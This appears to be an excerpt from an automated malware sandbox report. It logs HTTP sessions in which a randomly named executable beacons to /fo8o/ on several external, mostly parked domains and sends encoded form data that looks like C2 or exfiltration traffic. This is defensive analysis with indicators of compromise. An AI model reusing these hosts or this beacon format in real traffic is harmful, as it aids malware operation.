                                                                                      Data Raw: 4c 7a 59 34 72 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 74 73 6d 2f 72 43 70 61 30 37 2b 45 6d 4b 50 33 48 63 2b 76 79 6b 44 69 48 6d 48 36 46 54 46 69 4a 4a 63 65 38 72 2b 51 30 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6e 4d 4b 2f 55 2f 4a 50 4f 73 39 34 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 6b 6f 64 [TRUNCATED]
                                                                                      Data Ascii: LzY4r=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhy3TiUMatsm/rCpa07+EmKP3Hc+vykDiHmH6FTFiJJce8r+Q0YwLQCN3sREh2doGMcnIgSsJ2Kqh30x0KMRTOOg8TxUDT1agSJeAI38w7ti+skXnMK/U/JPOs94QIpxUw2MgMG9xgwhWturDzshCAvTmdPp/p+D3kod2l+4YvNn23tJipx85/rQsbb3tgjLhyi4g5fehCShG7oCKTUnlOGH7C/MLlLCFBepNCelwLd4FLiBmuRpWPONduHH5uTpVuvEswztqX9H0/4C93V5FciD6jh4S6IfuEsb550muWnceqjpZzyLMUiLSoJVqQL+zcWCniw0Hh4lfSGARHNWdetJURpb1cKc4BoreaHUzlfjjpBwHTFbksl7A5N0cWMSWF0+ax5mCqNg80J413kpZGCaX/mWbKQtKZD+KDffiiWCYdQ61Ao7JjvfTYaF8Dk1c22QF5xPtr/FfWSvnx9Y8/VtwPzaa22k/4lUJBcmXxOFtd/UQ1Eay20bWS+lfq/3HNV2dIznfcbuS0ZzXkAM0kcq/x1xC913I7O85b6Isp2iKns2FG0ACDO9oF2Sr9/hjdA6nlyorsVmx780qZwg1WSZcErDIou1XMEmuPvfDPGyScxmCVIh1rcf43NbeSoYEduOSor2km3pdEKGHckjSQfqIb1lpFuBxDo4pNHGW8suZ/s8tRkactdDWS30bXoUJUNTKsKsVOKSEqzRQKJS+Zo005P4bcnEr+CDbsAuE6mbrFEwvx+MPTnYDEzS7Cx+lIy5mQXGlsJCA6HBlghDeegpadcpcG/+gK1ZeJN+VqKndAN6qWtwWVvuWOl/agrk2iI8Fg [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.94992185.159.66.93804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:44:34.931458950 CET506OUTGET /fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckokWPFlpLgmRSSw2BhiETUwcdg1EQ== HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.magmadokum.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 6, 2024 17:45:36.259124994 CET194INHTTP/1.0 504 Gateway Time-out
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.94998391.195.240.94804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:45:41.765894890 CET771OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.rssnewscast.com
                                                                                      Origin: http://www.rssnewscast.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 194
                                                                                      Referer: http://www.rssnewscast.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 6f 39 38 51 63 4e 41 56 72 43 4d 46 39 71 6d 79 74 67 69 69 54 57 7a 56 31 67 5a 57
                                                                                      Data Ascii: LzY4r=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8o98QcNAVrCMF9qmytgiiTWzV1gZW
                                                                                      Dec 6, 2024 17:45:43.060255051 CET707INHTTP/1.1 405 Not Allowed
                                                                                      date: Fri, 06 Dec 2024 16:45:42 GMT
                                                                                      content-type: text/html
                                                                                      content-length: 556
                                                                                      server: Parking/1.0
                                                                                      connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.94998491.195.240.94804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:45:44.442523003 CET795OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.rssnewscast.com
                                                                                      Origin: http://www.rssnewscast.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 218
                                                                                      Referer: http://www.rssnewscast.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 7a 79 79 48 51 2b 51 48 6d 4e 4b 69 73 64 33 61 57 72 70 4d 75 51 36 78 53 50 4d 41 3d 3d
                                                                                      Data Ascii: LzY4r=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBzyyHQ+QHmNKisd3aWrpMuQ6xSPMA==
                                                                                      Dec 6, 2024 17:45:45.722722054 CET707INHTTP/1.1 405 Not Allowed
                                                                                      date: Fri, 06 Dec 2024 16:45:45 GMT
                                                                                      content-type: text/html
                                                                                      content-length: 556
                                                                                      server: Parking/1.0
                                                                                      connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.94998591.195.240.94804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:45:47.101723909 CET1808OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.rssnewscast.com
                                                                                      Origin: http://www.rssnewscast.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1230
                                                                                      Referer: http://www.rssnewscast.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 75 6d 32 33 67 59 51 33 54 2f 58 6f 6c 49 7a 6d 6f 4b 79 67 64 33 61 76 52 31 66 47 45 79 69 66 6e 59 69 4f 6d 6c 67 4e 56 52 65 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 4f 65 63 43 6a 7a 4b 2b 73 77 43 37 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 61 73 64 [TRUNCATED]
                                                                                      Data Ascii: LzY4r=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iYB1dbum23gYQ3T/XolIzmoKygd3avR1fGEyifnYiOmlgNVRehO165cO72lihNFLxkYCjVkRxMylLpHi/zqeJHI1du01B6aFVEC+GK9WJU6gYJUOecCjzK+swC7ayb8ZmHZeJ/4OSSDrXOqRDysWfN3irdbFhRxHasdGJ8fHmgRUQ7q75bPSfk5DUYG9UBoGdi8/mF/xbb5iSBE5JY12dA9aYXe5DGaUCD9a4C2fei4rNKdGN+BuOOAs4Lkir5hC28h2VCW7N63dm4PkACzu1ABunaNscL+QtWzR0nRbjK8h1wMNNZK1kvc/mwlEQqVN8sDqCclvTEA8PQZDkUqYvAt6bc2uMPldWMDMMjWKljpN+f43+WYphYD3frJIA07OfQD7qkklIn9A7m9F+97DMSJAUaztAjPdhRkUprNEZ0lx/4KDW3FzPEkIRyK1ay8+h0/DhtBP5wVdiGMZSfwbUdjQBOQWPJD2EsRPeS+o0mZnRUDmlvf2jzcm3zg5KZsa1Co+krN88UOq7PSV9IS9yGS9dWzkE28j6aUwW3VuE34YDrgP/9P7Q86Ie2t+fgb6ny3H8aMdt9szpOnAPv/it4V9yA4ncSaPiob8lsR4jMFEZDtFjV17Itvwz7p2mqeh94AUJ2Imx6DnUGhDM5pJTI25y0jfTmBYk/SaHRs8CGiNEa6Wmr1dk9xZNTb6oibQ4E7NJsUgRtQ1J0qW9hXkaHbofjzX71/d/Cn4gHitN9szMm4jR37jUNeheg1WHZXC3F60FvseM+r5P1cll85n/8qsZDQq7Jrl3NyIQB3n5lvJv3Ypek5QdjUQzHjR9gnS8s61b [TRUNCATED]
                                                                                      Dec 6, 2024 17:45:48.379008055 CET707INHTTP/1.1 405 Not Allowed
                                                                                      date: Fri, 06 Dec 2024 16:45:48 GMT
                                                                                      content-type: text/html
                                                                                      content-length: 556
                                                                                      server: Parking/1.0
                                                                                      connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.94998691.195.240.94804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:45:49.756489992 CET507OUTGET /fo8o/?LzY4r=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&F6=SVfTP6Q02ra8s0 HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.rssnewscast.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 6, 2024 17:45:51.066564083 CET1236INHTTP/1.1 200 OK
                                                                                      date: Fri, 06 Dec 2024 16:45:50 GMT
                                                                                      content-type: text/html; charset=UTF-8
                                                                                      transfer-encoding: chunked
                                                                                      vary: Accept-Encoding
                                                                                      expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                      cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      pragma: no-cache
                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_bNiWWRLyNndrP2BSvsoV3PPc+Ln6DX0U0fvm5x0UH7n3UC06grqjj28Hq/biV885XyEhWbM/lm28g86EhSqKPg==
                                                                                      last-modified: Fri, 06 Dec 2024 16:45:50 GMT
                                                                                      x-cache-miss-from: parking-f4f7c5ccf-n96cr
                                                                                      server: Parking/1.0
                                                                                      connection: close
                                                                                      Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 62 4e 69 57 57 52 4c 79 4e 6e 64 72 50 32 42 53 76 73 6f 56 33 50 50 63 2b 4c 6e 36 44 58 30 55 30 66 76 6d 35 78 30 55 48 37 6e 33 55 43 30 36 67 72 71 6a 6a 32 38 48 71 2f 62 69 56 38 38 35 58 79 45 68 57 62 4d 2f 6c 6d 32 38 67 38 36 45 68 53 71 4b 50 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                                                                      Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_bNiWWRLyNndrP2BSvsoV3PPc+Ln6DX0U0fvm5x0UH7n3UC06grqjj28Hq/biV885XyEhWbM/lm28g86EhSqKPg==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
                                                                                      Dec 6, 2024 17:45:51.066622972 CET1236INData Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69
                                                                                      Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchi1B4Eng for!"><link rel="icon" type="image/png" href="//img.
                                                                                      Dec 6, 2024 17:45:51.066634893 CET1236INData Raw: 6e 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d
                                                                                      Data Ascii: ne-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,sel
                                                                                      Dec 6, 2024 17:45:51.066775084 CET1236INData Raw: 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e
                                                                                      Data Ascii: h]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:n
                                                                                      Dec 6, 2024 17:45:51.066795111 CET896INData Raw: 69 6e 2d 68 65 69 67 68 74 3a 38 32 30 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 20 30 20 31 2e 36 65 6d 20 30 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c
                                                                                      Data Ascii: in-height:820px}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet
